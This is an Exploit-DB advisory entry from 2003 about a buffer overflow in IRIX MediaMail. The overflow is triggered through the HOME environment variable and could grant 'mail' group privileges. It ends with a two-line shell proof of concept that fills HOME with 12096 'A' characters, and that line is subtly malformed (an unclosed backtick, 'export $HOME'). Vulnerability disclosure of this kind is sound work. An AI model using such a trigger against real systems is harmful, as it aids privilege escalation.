IRIX 5.x/6.x - MediaMail HOME Environment Variable Buffer Overflow

EDB-ID:

22638

CVE:

N/A




Platform:

IRIX

Date:

2003-05-23


source: https://www.securityfocus.com/bid/7672/info

A buffer overflow vulnerability has been reported for the MediaMail binary that may result in a user obtaining elevated privileges.

Although unconfirmed, an attacker, using a custom crafted string, could overwrite stack memory, including the return address of a function, and potentially execute arbitrary code with group 'mail' privileges.

sh$ export $HOME=`perl -e 'print "A"x12096'
sh$ /usr/bin/X11/MediaMail